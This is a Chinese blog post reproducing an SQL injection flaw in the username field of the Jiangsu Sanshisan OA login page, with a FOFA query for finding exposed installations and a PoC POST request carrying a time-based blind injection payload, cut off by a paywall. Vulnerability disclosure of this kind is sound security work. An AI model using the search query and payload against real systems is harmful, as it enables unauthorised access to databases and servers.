江苏叁拾叁OA SQL注入漏洞复现

已于 2023-12-28 01:12:05 修改
阅读量797 收藏 7
点赞数 13
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2023-12-27 23:56:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/135258342
版权
本文详细介绍了江苏叁拾叁OA系统存在的SQL注入漏洞,该漏洞可能导致未授权攻击者获取数据库敏感信息,甚至进一步控制服务器。作者通过复现环境和PoC演示了漏洞利用过程,并给出了相应的修复建议,包括对提交数据的过滤和升级到安全版本。
摘要由CSDN通过智能技术生成

0x01 产品简介

江苏叁拾叁OA系统是基于J2EE平台开发出来的OA办公平台,支持微信、苹果、安卓、PC多个入口,基于工作流、表单、组织架构,通过按需配置,使企业内部人员方便快捷地共享信息,高效地协同工作。

0x02 漏洞概述

江苏叁拾叁OA系统 登录框username处存在SQL注入漏洞,未授权的攻击者可以利用此漏洞获取数据库敏感信息,深入利用可获取服务器权限。

0x03 复现环境

FOFA:app="江苏叁拾叁-OA"

0x04 漏洞复现

PoC

POST /login HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

username=1' AND (SELECT 8169 FROM (SELECT(SLEEP(
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 13
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
叁拾- NodeJS简单代理池(估计完了吧)SuperAgent 使用 Proxy 的惨痛经历 及做事要细心
01-07
叁拾贰- NodeJS简单代理池(有完没完?) 之 SuperAgent 使用代理不是 Timeout 的 Timeout 其实没想法可以直接看最底下。 那是结论。 壹。继续排查 TCP 连接数过多 我十分迷惑,于是查 netstat,以下是过程: ...
PHPWind论坛 贰拾街风格
11-27
PHPWind论坛是一款在中国广泛应用的开源社区论坛软件,其贰拾街风格是为该平台设计的一种独特的用户界面和用户体验设计。这款风格旨在提供一个既美观又功能丰富的交互环境,吸引并留住论坛用户。以下是关于PHPWind...
小写金额转换成大写金额
04-07
小写金额转换成大写金额 测试结果如下: 1000003201.01 壹拾亿零仟贰佰零壹元零壹分 10003201.01 壹仟万零仟贰佰零壹...33.00 叁拾元整 9.00 玖元整 20.00 贰拾元整 22.00 贰拾贰元整 有什么问题请告诉我,谢谢!
compileNum.rar
11-27
金额转大写,自测结果...112340023壹亿壹仟贰佰叁拾肆万零贰拾元整 112340123壹亿壹仟贰佰叁拾肆万零壹佰贰拾元整 112341000壹亿壹仟贰佰叁拾肆万壹仟元整 112341200壹亿壹仟贰佰叁拾肆万壹仟贰佰元整 。。。。。
js中文money数字大写转换
08-13
功能揪取:1200元转换为 壹仟贰佰元 AmountInWords(1200,x)= 壹仟贰佰元 其中x为 小数点后四舍五入的位数
安全:企业上云后不可忽视的安全挑战与解决方案
A526847的博客
08-14 556
企业上云是数字化转型的必然趋势,但云安全风险也如影随形。企业必须正视云安全挑战,采取切实有效的措施来保障云安全。通过数据加密、访问控制、安全审计、备份与恢复、灾备管理、选择可信的云服务供应商和加强内部安全管理等手段,企业可以构建完善的云安全体系,确保云服务的可靠性和安全性。在未来的数字化转型中,云安全将成为企业不可或缺的重要保障。
安全工具推荐-Search_Viewer资产测绘】
qq_55213436的博客
08-14 208
Search_Viewer,集Fofa、Hunter鹰图、Shodan、360 quake、Zoomeye 钟馗之眼、censys 为一体的空间测绘gui图形界面化工具,支持一键采集爬取和导出fofa、shodan等数据,方便快捷查看。包含语法帮助手册,忘记查询语法也能方便查看语法,渗透不二之选。
XMGoat:一款针对Azure的环境安全检测工具
FreeBuf_的博客
08-15 855
XMGoat是一款针对Azure的环境安全检测工具,XM Goat 由 XM Cyber Terraform 模板组成,可帮助您了解常见的 Azure 安全问题。2、使用初始用户和服务主体凭据,根据场景流程对目标环境执行安全测试(例如,XMGoat/scenarios/scenario_1/scenario1_flow.png)。3、如果您需要安全测试帮助,请参考解决方案(例如,XMGoat/scenarios/scenario_1/solution.md)。1、运行安装程序然后开始。
操作集合的工具类:Collections(以及将线程变安全的synchronized方法)
ABU009的博客
08-15 477
#操作集合的工具类:Collections
等保2.0时代,企业如何平衡安全与发展
waitaikong_的博客
08-14 343
此外,等保2.0还强化了安全管理的要求,企业需要建立完善的安全管理体系,包括安全策略、管理制度、人员培训、应急预案等,以确保安全保护措施的有效实施。等保2.0(网络安全等级保护2.0)是中国网络安全领域的重要标准,它在原有等保1.0的基础上进行了全面升级,以适应云计算、大数据、物联网、移动互联网等新兴技术的安全保护需求。等保2.0的实施促使企业加强网络安全管理和技术防范措施,这不仅有助于提升企业的网络安全防护水平,降低安全风险,还能提高企业的竞争力和信誉度。
IDS 与 IPS:网络安全的两道防线
hakksjss的博客
08-16 360
然而,IDS 也存在一定的局限性。它就像是网络世界中的“哨兵”,时刻保持警惕,依据一定的安全策略,分析网络数据包、系统日志等信息,试图发现各种潜在的攻击企图、入侵行为以及异常活动。此外,IPS 的误报率也是一个需要关注的问题,如果错误地拦截了正常的流量,可能会影响业务的正常运行。如果确定为攻击行为,IPS 则根据预先设置的规则和策略,立即阻断相关的流量,防止攻击对网络造成更大的破坏。它串联在网络中,实时分析流经的网络流量,一旦发现与已知攻击模式或异常行为相符的流量,立即采取行动,防止攻击的进一步扩散。
等保测评中的安全需求分析:构建精准的信息安全防护体系
w13359990065的博客
08-15 645
在实施数字化转型的过程中,企业应将安全需求分析视为持续优化安全防护体系的关键环节,通过跨部门合作、员工培训、技术应用等策略,不断调整和优化安全需求,为业务的持续健康发展提供坚实的安全保障。某金融机构通过等保测评的指导,实施了详细的安全需求分析,识别了其关键业务功能和信息资产,包括客户数据、交易系统等,基于风险评估的结果,制定了针对性的安全控制措施,如多因素认证、数据加密、网络隔离等,有效提升了信息安全防护水平。实施安全需求分析的过程中,企业可能面临一些挑战,如技术更新快、业务需求变化频繁、安全资源有限等。
Python Word文档安全 - 设置和解除Word文档保护
nuclear2011的博客
08-15 1065
这篇文章介绍了如何使用 Python 给 Word 文档设置密码,限制编辑权限(如只读,仅允许批注,或仅允许填写表单),设置可编辑区域,以及如何取消密码保护和编辑限制。包含详细的步骤介绍和代码示例。
安全入门day.02
mxxcxy的博客
08-14 1057
这里使用小皮面板部署网页(1)点击安装程序开始安装,在自定义选项中修改安装位置,根据自己实际安装位置设定,作者这里安装在C盘作为演示(2)点击立即安装,等待进度条走完(3)点击安装完成执行程序(4)如果出现以下界面就是安装成功了(5)根据设定的软件安装位置,部署网站,软件根目录下面有3个文件夹,第一个COM文件夹是小皮面板的配置文件,第二个Extensions文件夹是存放已经安装的软件环境,例如php、mysql和Apache等;
新160个crackme - 030-Acid Bytes.4
qq_41483767的博客
08-14 242
Delphi程序分析,upx脱壳,ida静态分析、动态调试,简单算法
四路一体行车记录仪,语音提示注意行人,保障车辆行驶安全
jiuxindianzi的博客
08-15 234
九盾安防推出四路一体行车记录仪,全方位记录叉车工作场景,实时记录行驶信息,提供高清影像,减少伤亡事故,提升安全性和效率,解决事故责任划分难题,助力企业管理。
CSP-CCF 202012-1 期末预测之安全指数
2301_79705447的博客
08-16 278
刚开始看到题目被没见过的ReLU吓到了,以为会很难,认真读懂题目后,感觉应该是我这些天做过的算最简单的了。所以说:不要被没见过的新鲜事物吓到,要迎难而上!
理解安全组与防火墙的关系:云安全的双重保障
最新发布
weixin_54574094的博客
08-18 574
通过理解它们的关系,并结合使用,您可以构建一个多层次的安全体系,确保您的系统和数据在面对日益复杂的网络威胁时仍然保持安全。您可以创建一个安全组,添加允许80(HTTP)和443(HTTPS)端口的入站规则,并将此安全组关联到您的Web服务器实例。例如,在一个企业的混合云环境中,您可以通过防火墙来保护本地数据中心的安全,同时通过安全组来管理云上实例的访问权限。安全组可以提供灵活、快速的实例级别的安全管理,而防火墙则负责更广泛的网络安全安全组是云计算环境中使用的虚拟防火墙,用于控制实例的入站和出站流量。
Linux 主机一键安全整改策略
weixin_45840241的博客
08-15 576
echo "---------ssh登录前警告banner设置----------"echo "---------禁止root用户远程登录----------"echo "---------设置用户密码过期时间----------"echo "---------设置密码复杂度限制----------"echo "---------配置pacct工具----------"echo "---------禁用不必要的别名----------"安装配置记录用户对设备的操作的pacct工具;
sql 数字转换成大写金额
05-18
在 SQL 中将数字转换成大写金额可以通过自定义函数来实现。以下是一个示例: ```sql CREATE FUNCTION dbo.NumToCny (@Num DECIMAL(18,2)) RETURNS VARCHAR(1024) AS BEGIN -- 数字对应的大写汉字 DECLARE @...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值